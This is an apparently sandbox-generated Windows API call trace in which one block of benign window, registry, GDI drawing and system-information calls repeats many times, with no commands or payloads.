[0017.486] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.486] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.486] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.486] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.486] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.486] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe6040713 [0017.486] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdc04027d [0017.486] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104096a [0017.486] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104096b [0017.487] CombineRgn (hrgnDst=0x104096a, hrgnSrc1=0xe6040713, hrgnSrc2=0xdc04027d, iMode=1) returned 1 [0017.487] CombineRgn (hrgnDst=0x104096b, hrgnSrc1=0xe6040713, hrgnSrc2=0xdc04027d, iMode=4) returned 2 [0017.487] CreateSolidBrush (color=0xff) returned 0x2100969 [0017.487] CreateSolidBrush (color=0xff0000) returned 0x110096c [0017.487] DeleteObject (ho=0x110096c) returned 1 [0017.487] DeleteObject (ho=0xdc04027d) returned 1 [0017.487] DeleteObject (ho=0xe6040713) returned 1 [0017.487] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.487] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.487] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.487] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.487] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.487] BeginPath (hdc=0x0) returned 0 [0017.487] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.487] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.487] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.487] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.487] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.487] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.487] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.487] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.487] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdd04027d [0017.487] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe7040713 [0017.487] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104096d [0017.487] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104096e [0017.487] CombineRgn (hrgnDst=0x104096d, hrgnSrc1=0xdd04027d, hrgnSrc2=0xe7040713, iMode=1) returned 1 [0017.487] CombineRgn (hrgnDst=0x104096e, hrgnSrc1=0xdd04027d, hrgnSrc2=0xe7040713, iMode=4) returned 2 [0017.487] CreateSolidBrush (color=0xff) returned 0x210096c [0017.487] CreateSolidBrush (color=0xff0000) returned 0x110096f [0017.487] DeleteObject (ho=0x110096f) returned 1 [0017.488] DeleteObject (ho=0xe7040713) returned 1 [0017.488] DeleteObject (ho=0xdd04027d) returned 1 [0017.488] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.488] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.488] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.488] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.488] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.488] BeginPath (hdc=0x0) returned 0 [0017.488] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.488] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.488] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.488] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.488] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.488] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.488] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.488] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.488] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe8040713 [0017.488] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xde04027d [0017.488] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040970 [0017.488] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040971 [0017.488] CombineRgn (hrgnDst=0x1040970, hrgnSrc1=0xe8040713, hrgnSrc2=0xde04027d, iMode=1) returned 1 [0017.488] CombineRgn (hrgnDst=0x1040971, hrgnSrc1=0xe8040713, hrgnSrc2=0xde04027d, iMode=4) returned 2 [0017.488] CreateSolidBrush (color=0xff) returned 0x210096f [0017.488] CreateSolidBrush (color=0xff0000) returned 0x1100972 [0017.488] DeleteObject (ho=0x1100972) returned 1 [0017.488] DeleteObject (ho=0xde04027d) returned 1 [0017.488] DeleteObject (ho=0xe8040713) returned 1 [0017.488] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.488] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.488] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.489] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.489] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.489] BeginPath (hdc=0x0) returned 0 [0017.489] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.489] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.489] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.489] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.489] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.489] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.489] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.489] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.489] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdf04027d [0017.489] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe9040713 [0017.489] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040973 [0017.489] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040974 [0017.489] CombineRgn (hrgnDst=0x1040973, hrgnSrc1=0xdf04027d, hrgnSrc2=0xe9040713, iMode=1) returned 1 [0017.489] CombineRgn (hrgnDst=0x1040974, hrgnSrc1=0xdf04027d, hrgnSrc2=0xe9040713, iMode=4) returned 2 [0017.489] CreateSolidBrush (color=0xff) returned 0x2100972 [0017.489] CreateSolidBrush (color=0xff0000) returned 0x1100975 [0017.489] DeleteObject (ho=0x1100975) returned 1 [0017.489] DeleteObject (ho=0xe9040713) returned 1 [0017.489] DeleteObject (ho=0xdf04027d) returned 1 [0017.489] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.489] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.489] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.489] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.489] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.489] BeginPath (hdc=0x0) returned 0 [0017.489] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.489] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.489] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.489] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.489] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.490] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.490] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.490] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.490] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xea040713 [0017.490] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe004027d [0017.490] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040976 [0017.490] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040977 [0017.490] CombineRgn (hrgnDst=0x1040976, hrgnSrc1=0xea040713, hrgnSrc2=0xe004027d, iMode=1) returned 1 [0017.490] CombineRgn (hrgnDst=0x1040977, hrgnSrc1=0xea040713, hrgnSrc2=0xe004027d, iMode=4) returned 2 [0017.490] CreateSolidBrush (color=0xff) returned 0x2100975 [0017.490] CreateSolidBrush (color=0xff0000) returned 0x1100978 [0017.490] DeleteObject (ho=0x1100978) returned 1 [0017.490] DeleteObject (ho=0xe004027d) returned 1 [0017.490] DeleteObject (ho=0xea040713) returned 1 [0017.490] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.490] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.490] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.490] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.490] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.490] BeginPath (hdc=0x0) returned 0 [0017.490] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.490] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.490] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.490] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.490] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.490] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.490] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.490] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.491] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe104027d [0017.491] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xeb040713 [0017.491] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040979 [0017.491] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104097a [0017.491] CombineRgn (hrgnDst=0x1040979, hrgnSrc1=0xe104027d, hrgnSrc2=0xeb040713, iMode=1) returned 1 [0017.491] CombineRgn (hrgnDst=0x104097a, hrgnSrc1=0xe104027d, hrgnSrc2=0xeb040713, iMode=4) returned 2 [0017.491] CreateSolidBrush (color=0xff) returned 0x2100978 [0017.491] CreateSolidBrush (color=0xff0000) returned 0x110097b [0017.491] DeleteObject (ho=0x110097b) returned 1 [0017.491] DeleteObject (ho=0xeb040713) returned 1 [0017.491] DeleteObject (ho=0xe104027d) returned 1 [0017.491] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.491] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.491] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.491] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.491] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.491] BeginPath (hdc=0x0) returned 0 [0017.491] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.491] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.491] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.491] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.491] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.491] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.491] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.491] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.491] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xec040713 [0017.491] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe204027d [0017.491] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104097c [0017.492] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104097d [0017.492] CombineRgn (hrgnDst=0x104097c, hrgnSrc1=0xec040713, hrgnSrc2=0xe204027d, iMode=1) returned 1 [0017.492] CombineRgn (hrgnDst=0x104097d, hrgnSrc1=0xec040713, hrgnSrc2=0xe204027d, iMode=4) returned 2 [0017.492] CreateSolidBrush (color=0xff) returned 0x210097b [0017.492] CreateSolidBrush (color=0xff0000) returned 0x110097e [0017.492] DeleteObject (ho=0x110097e) returned 1 [0017.492] DeleteObject (ho=0xe204027d) returned 1 [0017.492] DeleteObject (ho=0xec040713) returned 1 [0017.492] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.492] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.492] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.492] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.492] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.492] BeginPath (hdc=0x0) returned 0 [0017.492] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.492] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.492] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.492] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.492] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.492] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.492] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.492] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.492] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe304027d [0017.492] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xed040713 [0017.492] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104097f [0017.492] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040980 [0017.492] CombineRgn (hrgnDst=0x104097f, hrgnSrc1=0xe304027d, hrgnSrc2=0xed040713, iMode=1) returned 1 [0017.492] CombineRgn (hrgnDst=0x1040980, hrgnSrc1=0xe304027d, hrgnSrc2=0xed040713, iMode=4) returned 2 [0017.492] CreateSolidBrush (color=0xff) returned 0x210097e [0017.492] CreateSolidBrush (color=0xff0000) returned 0x1100981 [0017.493] DeleteObject (ho=0x1100981) returned 1 [0017.493] DeleteObject (ho=0xed040713) returned 1 [0017.493] DeleteObject (ho=0xe304027d) returned 1 [0017.493] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.493] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.493] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.493] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.493] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.493] BeginPath (hdc=0x0) returned 0 [0017.493] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.493] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.493] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.493] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.493] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.493] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.493] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.493] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.493] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xee040713 [0017.493] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe404027d [0017.493] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040982 [0017.493] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040983 [0017.493] CombineRgn (hrgnDst=0x1040982, hrgnSrc1=0xee040713, hrgnSrc2=0xe404027d, iMode=1) returned 1 [0017.493] CombineRgn (hrgnDst=0x1040983, hrgnSrc1=0xee040713, hrgnSrc2=0xe404027d, iMode=4) returned 2 [0017.493] CreateSolidBrush (color=0xff) returned 0x2100981 [0017.493] CreateSolidBrush (color=0xff0000) returned 0x1100984 [0017.493] DeleteObject (ho=0x1100984) returned 1 [0017.493] DeleteObject (ho=0xe404027d) returned 1 [0017.493] DeleteObject (ho=0xee040713) returned 1 [0017.493] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.493] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.494] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.494] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.494] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.494] BeginPath (hdc=0x0) returned 0 [0017.494] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.494] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.494] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.494] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.494] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.494] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.494] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.494] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.494] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe504027d [0017.494] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xef040713 [0017.494] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040985 [0017.494] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040986 [0017.494] CombineRgn (hrgnDst=0x1040985, hrgnSrc1=0xe504027d, hrgnSrc2=0xef040713, iMode=1) returned 1 [0017.494] CombineRgn (hrgnDst=0x1040986, hrgnSrc1=0xe504027d, hrgnSrc2=0xef040713, iMode=4) returned 2 [0017.494] CreateSolidBrush (color=0xff) returned 0x2100984 [0017.494] CreateSolidBrush (color=0xff0000) 